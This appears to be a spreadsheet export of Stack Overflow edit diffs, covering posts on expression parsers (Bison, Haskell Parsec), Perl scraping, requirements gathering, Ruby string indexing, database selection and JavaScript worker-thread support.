 &lt;p&gt;&lt;strong&gt;Notes:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(1)&lt;/span&gt; Richard Stallman says, in &lt;a href="http://web.cecs.pdx.edu/%7Etrent/gnu/tcl-not" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Why you should not use Tcl&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; The principal lesson of Emacs is that a language for extensions should not be a mere "extension language". It should be a real programming language, designed for writing and maintaining substantial programs. Because people will want to do that!&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(2)&lt;/span&gt; Yes, I am forever scarred from using that "language".&lt;/p&gt; _x000D_
 &lt;p&gt; Also note that when I submitted this entry, the preview was correct, but &lt;strong&gt;SO's less than adequate parser ate my close anchor tag on the first paragraph&lt;/strong&gt;, proving that parsers are not something to be trifled with because if you use regexes and one off hacks &lt;strong&gt;you will probably get something subtle and small wrong&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(3)&lt;/span&gt; Snippet of a Haskell parser using Parsec: a four function calculator extended with exponents, parentheses, whitespace for multiplication, and constants (like pi and e).&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;aexpr   =   expr `chainl1` toOp_x000D_
expr    =   optChainl1 term addop (toScalar 0)_x000D_
term    =   factor `chainl1` mulop_x000D_
factor  =   sexpr  `chainr1` powop_x000D_
sexpr   =   parens aexpr_x000D_
        &amp;lt;|&amp;gt; scalar_x000D_
        &amp;lt;|&amp;gt; ident_x000D_
    _x000D_
powop   =   sym "^" &amp;gt;&amp;gt;= return . (B Pow)_x000D_
        &amp;lt;|&amp;gt; sym "^-" &amp;gt;&amp;gt;= return . (\x y -&amp;gt; B Pow x (B Sub (toScalar 0) y))_x000D_
_x000D_
toOp    =   sym "-&amp;gt;" &amp;gt;&amp;gt;= return . (B To)_x000D_
_x000D_
mulop   =   sym "*" &amp;gt;&amp;gt;= return . (B Mul)_x000D_
        &amp;lt;|&amp;gt; sym "/" &amp;gt;&amp;gt;= return . (B Div)_x000D_
        &amp;lt;|&amp;gt; sym "%" &amp;gt;&amp;gt;= return . (B Mod)_x000D_
        &amp;lt;|&amp;gt;             return . (B Mul)_x000D_
_x000D_
addop   =   sym "+" &amp;gt;&amp;gt;= return . (B Add) _x000D_
        &amp;lt;|&amp;gt; sym "-" &amp;gt;&amp;gt;= return . (B Sub)_x000D_
_x000D_
scalar = number &amp;gt;&amp;gt;= return . toScalar_x000D_
_x000D_
ident  = literal &amp;gt;&amp;gt;= return . Lit_x000D_
_x000D_
parens p = do_x000D_
             lparen_x000D_
             result &amp;lt;- p_x000D_
             rparen_x000D_
             return result_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The hard way:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; You may want a &lt;a href="http://en.wikipedia.org/wiki/Recursive_descent_parser" rel="nofollow noreferrer"&gt;recursive decent parser&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; To&lt;/span&gt; get precedence you need to think recursively, for example, using your sample string,&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;1+11*5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; to do this manually, you would have to read the 1, then see the plus and start a whole new recursive parse "session" starting with 11... and make sure to parse the &lt;span class="diff-add"&gt;11 * 5&lt;/span&gt; into its own factor, yielding a parse tree with&lt;span class="diff-add"&gt; 1 +&lt;/span&gt; &lt;span class="diff-add"&gt;(11 * 5)&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; This all feels so painful even to attempt to explain, especially with the added powerlessness of C. See, after parsing the 11, if the * was actually a + instead, you would have to abandon the attempt at making a term and instead parse the 11 itself as a factor. My head is already exploding. It's possible with the recursive decent strategy, but there is a better way...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The easy (right) way&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you use a GPL tool like Bison, you probably don't need to worry about licensing issues since the C code generated by bison is not covered by the GPL (IANAL but I'm pretty sure GPL tools don't force the GPL on generated code/binaries; for example Apple compiles code like say, Aperture with GCC and they sell it without having to GPL said code)&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Download Bison (or something equivalent, ANTLR, etc&lt;/span&gt;.&lt;span class="diff-add"&gt;):&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gnu.org/software/bison/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www&lt;/span&gt;.&lt;span class="diff-add"&gt;gnu.org/software/bison/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; There is usually some sample code that you can just run bison on and get your desired C code that demonstrates &lt;span class="diff-add"&gt;this four function calculator:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gnu.org/software/bison/manual/html_mono/bison.html#Infix-Calc" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.gnu.org/software/bison/manual/html_mono/bison.html#Infix-Calc&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Look at the generated code, and see that this is not as easy as it sounds. Also, the advantages of using a tool like Bison are 1) you learn something (especially if you read the Dragon book and learn about grammars), 2) you avoid &lt;a href="http://en.wikipedia.org/wiki/Not_Invented_Here" rel="nofollow noreferrer"&gt;NIH&lt;/a&gt; trying to reinvent the wheel. With a real parser-generator tool, you actually have a hope at scaling up later, showing other people you know that parsers are the domain of parsing tools.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; People here have offered much sound advice. My only warning against skipping the parsing tools or just using the Shunting Yard algorithm or a hand rolled recursive decent parser is that little toy &lt;span class="diff-add"&gt;languages[1]&lt;/span&gt; may someday turn into big actual languages with functions (sin, cos, log) and variables, conditions and for loops.&lt;/p&gt; _x000D_
 &lt;p&gt; Flex/Bison may very well be overkill for a small, simple interpreter, but a one off parser+evaluator may cause trouble down the line when changes need to be made or features need to be added. Your situation will vary and you will need to use your judgement; just don't &lt;a href="http://torque.realinfo.de/index.php?title=Torque_Scripting_Language" rel="nofollow noreferrer"&gt;punish other people for your sins&lt;/a&gt;&lt;span class="diff-add"&gt; [2]&lt;/span&gt; and build a less than adequate tool.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;My favorite tool for parsing&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The best tool in the world for the job is the &lt;a href="http://book.realworldhaskell.org/read/using-parsec.html" rel="nofollow noreferrer"&gt;Parsec&lt;/a&gt; library (for recursive decent parsers) which comes with the programming language Haskell. It looks a lot like &lt;a href="http://en.wikipedia.org/wiki/Backus%E2%80%93Naur_form" rel="nofollow noreferrer"&gt;BNF&lt;/a&gt;, or like some specialized tool or domain specific language for parsing (sample code &lt;span class="diff-add"&gt;[3]&lt;/span&gt;), but it is in fact just a regular library in Haskell, meaning that it compiles in the same build step as the rest of your Haskell code, and you can write arbitrary Haskell code and call that within your parser, and you can mix and match other libraries &lt;em&gt;all in the same code&lt;/em&gt;. (Embedding a parsing language like this in a language other than Haskell results in loads of syntactic cruft, by the way. I did this in C# and it works quite well but it is not so pretty and succinct.)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Notes:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; [1]&lt;/span&gt; Richard Stallman says, in &lt;a href="http://web.cecs.pdx.edu/~trent/gnu/tcl-not" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Why you should not use Tcl&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; The principal lesson of Emacs is that a language for extensions should not be a mere "extension language". It should be a real programming language, designed for writing and maintaining substantial programs. Because people will want to do that!&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; [2]&lt;/span&gt; Yes, I am forever scarred from using that "language".&lt;/p&gt; _x000D_
 &lt;p&gt; Also note that when I submitted this entry, the preview was correct, but &lt;strong&gt;SO's less than adequate parser ate my close anchor tag on the first paragraph&lt;/strong&gt;, proving that parsers are not something to be trifled with because if you use regexes and one off hacks &lt;strong&gt;you will probably get something subtle and small wrong&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; [3]&lt;/span&gt; Snippet of a Haskell parser using Parsec: a four function calculator extended with exponents, parentheses, whitespace for multiplication, and constants (like pi and e).&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;aexpr   =   expr `chainl1` toOp_x000D_
expr    =   optChainl1 term addop (toScalar 0)_x000D_
term    =   factor `chainl1` mulop_x000D_
factor  =   sexpr  `chainr1` powop_x000D_
sexpr   =   parens aexpr_x000D_
        &amp;lt;|&amp;gt; scalar_x000D_
        &amp;lt;|&amp;gt; ident_x000D_
    _x000D_
powop   =   sym "^" &amp;gt;&amp;gt;= return . (B Pow)_x000D_
        &amp;lt;|&amp;gt; sym "^-" &amp;gt;&amp;gt;= return . (\x y -&amp;gt; B Pow x (B Sub (toScalar 0) y))_x000D_
_x000D_
toOp    =   sym "-&amp;gt;" &amp;gt;&amp;gt;= return . (B To)_x000D_
_x000D_
mulop   =   sym "*" &amp;gt;&amp;gt;= return . (B Mul)_x000D_
        &amp;lt;|&amp;gt; sym "/" &amp;gt;&amp;gt;= return . (B Div)_x000D_
        &amp;lt;|&amp;gt; sym "%" &amp;gt;&amp;gt;= return . (B Mod)_x000D_
        &amp;lt;|&amp;gt;             return . (B Mul)_x000D_
_x000D_
addop   =   sym "+" &amp;gt;&amp;gt;= return . (B Add) _x000D_
        &amp;lt;|&amp;gt; sym "-" &amp;gt;&amp;gt;= return . (B Sub)_x000D_
_x000D_
scalar = number &amp;gt;&amp;gt;= return . toScalar_x000D_
_x000D_
ident  = literal &amp;gt;&amp;gt;= return . Lit_x000D_
_x000D_
parens p = do_x000D_
             lparen_x000D_
             result &amp;lt;- p_x000D_
             rparen_x000D_
             return result_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Eclipse</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Another option for perl would be &lt;a href="http://http://search.cpan.org/%7Emiyagawa/Web-Scraper/lib/Web/Scraper.pm" rel="nofollow noreferrer" title="Web::Scraper"&gt;&lt;span class="diff-delete"&gt;Web::Scraper&lt;/span&gt;&lt;/a&gt; which is based on Ruby's &lt;a href="http://blog.labnotes.org/2006/07/11/scraping-with-style-scrapi-toolkit-for-ruby/" rel="nofollow noreferrer" title="Scrapi"&gt;&lt;span class="diff-delete"&gt;Scrapi&lt;/span&gt;&lt;/a&gt;. In a nutshell, with nice and concise syntax you can get robust scraper directly into datastructures.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Another option for perl would be &lt;a href="http://search.cpan.org/%7Emiyagawa/Web-Scraper/lib/Web/Scraper.pm" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;WebScraper&lt;/span&gt;&lt;/a&gt; which is based on Ruby's &lt;a href="http://blog.labnotes.org/2006/07/11/scraping-with-style-scrapi-toolkit-for-ruby/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Scrapi&lt;/span&gt;&lt;/a&gt;. In a nutshell, with nice and concise syntax you can get robust scraper directly into datastructures.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://steve-yegge.blogspot.com/2008/08/business-requirements-are-bullshit.html" rel="nofollow noreferrer"&gt;Steve Yegge&lt;/a&gt; talks fun but there is money to be made in working out what other people's requirements are so i'd take his article with a pinch of salt.&lt;/p&gt; _x000D_
 &lt;p&gt; Requirements gathering is incredibly tough because of the manner in which communication works. Its a four step process that is lossy in each step.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; I have an idea in my head&lt;/li&gt; _x000D_
  &lt;li&gt; I transform this into words and pictures&lt;/li&gt; _x000D_
  &lt;li&gt; You interpret the pictures and words&lt;/li&gt; _x000D_
  &lt;li&gt; You paint an image in your own mind of what my original idea was like&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; And humans &lt;span class="diff-delete"&gt;mess&lt;/span&gt; this up constantly, through their adorable imperfections.&lt;/p&gt; _x000D_
 &lt;p&gt; Agile does right in promoting iterative development. Getting early versions out to the client is important in identifying what features are most important (what ships in 0.1 - 0.5 ish), helps to keep you both on the right track in terms of how the application will work and quickly identifies the hidden features that you &lt;em&gt;will&lt;/em&gt; miss.&lt;/p&gt; _x000D_
 &lt;p&gt; The two main problem scenarios are the two ends of the scales:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Not knowing what you are doing&lt;/strong&gt; - get some domain experts&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Having too many requirements&lt;/strong&gt; - feature pit. - Question, cull (prioritise ;) ) features and use iterative development&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Yegge does well in pointing out that domain experts are essential to produce good requirements because they know the business and have worked in it. They can help identify the core desire of the client and will help explain how their staff will use the system and what is important to the staff. Alternatives and additions include trying to do the job yourself to get into the mindset or having a client staff member occasionally on-site, although the latter is unlikely to happen.&lt;/p&gt; _x000D_
 &lt;p&gt; The feature pit is the other side, mostly full of failed government IT projects. Too much, too soon, not enough thought or application of realism (but what do you expect they have only about four years to make themselves feel important?). The aim here is to work out what the customer &lt;em&gt;really&lt;/em&gt; wants. As long as you work on getting the core components correct, efficient and bug-free clients usually remain tolerant of missing features that arrive in later shipments, as long as they eventually arrive. This is where iterative development really helps.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember to separate the client's ideas of what the program will be like and what they want the program to &lt;em&gt;achieve&lt;/em&gt;. Some clients can create confusion by communicating their requirements in the form of application features which may be poorly thought out or made redundant by much simpler functionality then they think they require. While I'm not advocating calling the client an idiot or not listening to them I feel that it is worth forever asking &lt;em&gt;why&lt;/em&gt; they want a particular feature to get to its underlying purpose.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember that in either scenario it is of imperative importantance to root out the quickest path to fulfilling the customers &lt;em&gt;core&lt;/em&gt; need and put you in a scenario where you are both profiting from the relationship.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://steve-yegge.blogspot.com/2008/08/business-requirements-are-bullshit.html" rel="nofollow noreferrer"&gt;Steve Yegge&lt;/a&gt; talks fun but there is money to be made in working out what other people's requirements are so i'd take his article with a pinch of salt.&lt;/p&gt; _x000D_
 &lt;p&gt; Requirements gathering is incredibly tough because of the manner in which communication works. Its a four step process that is lossy in each step.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; I have an idea in my head&lt;/li&gt; _x000D_
  &lt;li&gt; I transform this into words and pictures&lt;/li&gt; _x000D_
  &lt;li&gt; You interpret the pictures and words&lt;/li&gt; _x000D_
  &lt;li&gt; You paint an image in your own mind of what my original idea was like&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; And humans &lt;span class="diff-add"&gt;fuck&lt;/span&gt; this up constantly, through their adorable imperfections.&lt;/p&gt; _x000D_
 &lt;p&gt; Agile does right in promoting iterative development. Getting early versions out to the client is important in identifying what features are most important (what ships in 0.1 - 0.5 ish), helps to keep you both on the right track in terms of how the application will work and quickly identifies the hidden features that you &lt;em&gt;will&lt;/em&gt; miss.&lt;/p&gt; _x000D_
 &lt;p&gt; The two main problem scenarios are the two ends of the scales:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Not knowing what&lt;span class="diff-add"&gt; the fuck&lt;/span&gt; you are doing&lt;/strong&gt; - get some domain experts&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Having too many requirements&lt;/strong&gt; - feature pit. - Question, cull (prioritise ;) ) features and use iterative development&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Yegge does well in pointing out that domain experts are essential to produce good requirements because they know the business and have worked in it. They can help identify the core desire of the client and will help explain how their staff will use the system and what is important to the staff. Alternatives and additions include trying to do the job yourself to get into the mindset or having a client staff member occasionally on-site, although the latter is unlikely to happen.&lt;/p&gt; _x000D_
 &lt;p&gt; The feature pit is the other side, mostly full of failed government IT projects. Too much, too soon, not enough thought or application of realism (but what do you expect they have only about four years to make themselves feel important?). The aim here is to work out what the customer &lt;em&gt;really&lt;/em&gt; wants. As long as you work on getting the core components correct, efficient and bug-free clients usually remain tolerant of missing features that arrive in later shipments, as long as they eventually arrive. This is where iterative development really helps.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember to separate the client's ideas of what the program will be like and what they want the program to &lt;em&gt;achieve&lt;/em&gt;. Some clients can create confusion by communicating their requirements in the form of application features which may be poorly thought out or made redundant by much simpler functionality then they think they require. While I'm not advocating calling the client an idiot or not listening to them I feel that it is worth forever asking &lt;em&gt;why&lt;/em&gt; they want a particular feature to get to its underlying purpose.&lt;/p&gt; _x000D_
 &lt;p&gt; Remember that in either scenario it is of imperative importantance to root out the quickest path to fulfilling the customers &lt;em&gt;core&lt;/em&gt; need and put you in a scenario where you are both profiting from the relationship.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Quibblesome</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I have some&lt;/span&gt; Ruby&lt;span class="diff-delete"&gt; code I'm writing and when I give it the String "0123"&lt;/span&gt;, &lt;span class="diff-delete"&gt;I want to be able&lt;/span&gt; to print out the individual elements. &lt;span class="diff-delete"&gt;But when I try to print out these elements&lt;/span&gt;, I'm seeing &lt;span class="diff-delete"&gt;the&lt;/span&gt; ASCII values instead:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; a = "0123"_x000D_
=&amp;gt; "0123"_x000D_
&amp;gt;&amp;gt; a[0]_x000D_
=&amp;gt; 48_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I've looked online but can't find any way to get the original "0" back out of it. I'm a little new to Ruby to I know it has to be something simple but I just can't seem to find it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;In&lt;/span&gt; Ruby, &lt;span class="diff-add"&gt;trying&lt;/span&gt; to print out the individual elements&lt;span class="diff-add"&gt; of a String is giving me trouble&lt;/span&gt;. &lt;span class="diff-add"&gt;Instead of seeing each character&lt;/span&gt;, I'm seeing &lt;span class="diff-add"&gt;their&lt;/span&gt; ASCII values instead:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; a = "0123"_x000D_
=&amp;gt; "0123"_x000D_
&amp;gt;&amp;gt; a[0]_x000D_
=&amp;gt; 48_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I've looked online but can't find any way to get the original "0" back out of it. I'm a little new to Ruby to I know it has to be something simple but I just can't seem to find it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chris Bunch</t>
  </si>
  <si>
    <t>DevelopingChris</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;This question has 4 parts:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; What are the constraints/criteria you use for selecting a&lt;span class="diff-delete"&gt; SQL&lt;/span&gt; database?&lt;/li&gt; _x000D_
  &lt;li&gt; How well do the various databases you've used meet those constraints/criteria?&lt;/li&gt; _x000D_
  &lt;li&gt; What special features do the databases have?&lt;/li&gt; _x000D_
  &lt;li&gt; Which databases do you feel comfortable recommending to others?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;We're living in a golden age of databases, with numerous high quality commercial and free databases. This is great, but the downside is there's not a simple obvious choice for someone who needs a database for his next project.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; What are the constraints/criteria you use for selecting a database?&lt;/li&gt; _x000D_
  &lt;li&gt; How well do the various databases you've used meet those constraints/criteria?&lt;/li&gt; _x000D_
  &lt;li&gt; What special features do the databases have?&lt;/li&gt; _x000D_
  &lt;li&gt; Which databases do you feel comfortable recommending to others?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; etc...&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JasonMArcher</t>
  </si>
  <si>
    <t>Mr. Llama</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; See &lt;a href="http://caniuse.com/#search=worker" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;this&lt;/span&gt;&lt;/a&gt; for the most up-to-date support info.&lt;/p&gt; _x000D_
 &lt;p&gt; The following was the state of support circa 2009.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; The words you want to google for are &lt;a href="http://www.google.com/search?q=JavaScript+worker+threads" rel="nofollow noreferrer"&gt;JavaScript Worker Threads&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Apart from from &lt;a href="http://gears.google.com/" rel="nofollow noreferrer"&gt;Gears&lt;/a&gt; there's nothing available right now, but there's plenty of talk about how to implement this so I guess watch this question as the answer will no doubt change in future.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the relevant documentation for Gears: &lt;a href="http://code.google.com/apis/gears/api_workerpool.html" rel="nofollow noreferrer"&gt;WorkerPool API&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; WHATWG has a Draft Recommendation for worker threads: &lt;a href="http://www.whatwg.org/specs/web-workers/current-work/" rel="nofollow noreferrer"&gt;Web Workers&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; And there's also Mozillaâ€™s &lt;a href="https://wiki.mozilla.org/DOMWorkerThreads" rel="nofollow noreferrer"&gt;DOM Worker Threads&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; June 2009, current state of browser support for JavaScript threads&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Firefox 3.5&lt;/strong&gt; has web workers. Some demos of web workers, if you want to see them in action:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://blog.mozbox.org/post/2009/04/10/Web-Workers-in-action" rel="nofollow noreferrer"&gt;Simulated Annealing&lt;/a&gt; ("Try it" link)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://developer.mozilla.org/web-tech/2008/12/04/web-workers-part-2/" rel="nofollow noreferrer"&gt;Space Invaders&lt;/a&gt; (link at end of post)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.yafla.com/dforbes/Web_Workers_and_You__A_Faster_More_Powerful_JavaScript_World" rel="nofollow noreferrer"&gt;MoonBat JavaScript Benchmark&lt;/a&gt; (first link)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The Gears plugin can also be installed in Firefox.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Safari 4&lt;/strong&gt;, and the &lt;strong&gt;WebKit nightlies&lt;/strong&gt; have worker threads:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://blog.owensperformance.com/2009/02/safari-4-worker-threads-javascript-domination/" rel="nofollow noreferrer"&gt;JavaScript Ray Tracer&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Chrome&lt;/strong&gt; has Gears baked in, so it can do threads, although it requires a confirmation prompt from the user (and it uses a different API to web workers, although it will work in any browser with the Gears plugin installed):&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://code.google.com/apis/gears/samples/hello_world_workerpool/hello_world_workerpool.html" rel="nofollow noreferrer"&gt;Google Gears WorkerPool Demo&lt;/a&gt; (not a good example as it runs too fast to test in Chrome and Firefox, although IE runs it slow enough to see it blocking interaction)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;IE8&lt;/strong&gt; and &lt;strong&gt;IE9&lt;/strong&gt; can only do threads with the Gears plugin installed&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; See &lt;a href="http://caniuse.com/#search=worker" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://caniuse.com/#search=worker&lt;/span&gt;&lt;/a&gt; for the most up-to-date support info.&lt;/p&gt; _x000D_
 &lt;p&gt; The following was the state of support circa 2009.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; The words you want to google for are &lt;a href="http://www.google.com/search?q=JavaScript+worker+threads" rel="nofollow noreferrer"&gt;JavaScript Worker Threads&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Apart from from &lt;a href="http://gears.google.com/" rel="nofollow noreferrer"&gt;Gears&lt;/a&gt; there's nothing available right now, but there's plenty of talk about how to implement this so I guess watch this question as the answer will no doubt change in future.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the relevant documentation for Gears: &lt;a href="http://code.google.com/apis/gears/api_workerpool.html" rel="nofollow noreferrer"&gt;WorkerPool API&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; WHATWG has a Draft Recommendation for worker threads: &lt;a href="http://www.whatwg.org/specs/web-workers/current-work/" rel="nofollow noreferrer"&gt;Web Workers&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; And there's also Mozillaâ€™s &lt;a href="https://wiki.mozilla.org/DOMWorkerThreads" rel="nofollow noreferrer"&gt;DOM Worker Threads&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; June 2009, current state of browser support for JavaScript threads&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Firefox 3.5&lt;/strong&gt; has web workers. Some demos of web workers, if you want to see them in action:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://blog.mozbox.org/post/2009/04/10/Web-Workers-in-action" rel="nofollow noreferrer"&gt;Simulated Annealing&lt;/a&gt; ("Try it" link)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://developer.mozilla.org/web-tech/2008/12/04/web-workers-part-2/" rel="nofollow noreferrer"&gt;Space Invaders&lt;/a&gt; (link at end of post)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.yafla.com/dforbes/Web_Workers_and_You__A_Faster_More_Powerful_JavaScript_World" rel="nofollow noreferrer"&gt;MoonBat JavaScript Benchmark&lt;/a&gt; (first link)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The Gears plugin can also be installed in Firefox.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Safari 4&lt;/strong&gt;, and the &lt;strong&gt;WebKit nightlies&lt;/strong&gt; have worker threads:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://blog.owensperformance.com/2009/02/safari-4-worker-threads-javascript-domination/" rel="nofollow noreferrer"&gt;JavaScript Ray Tracer&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
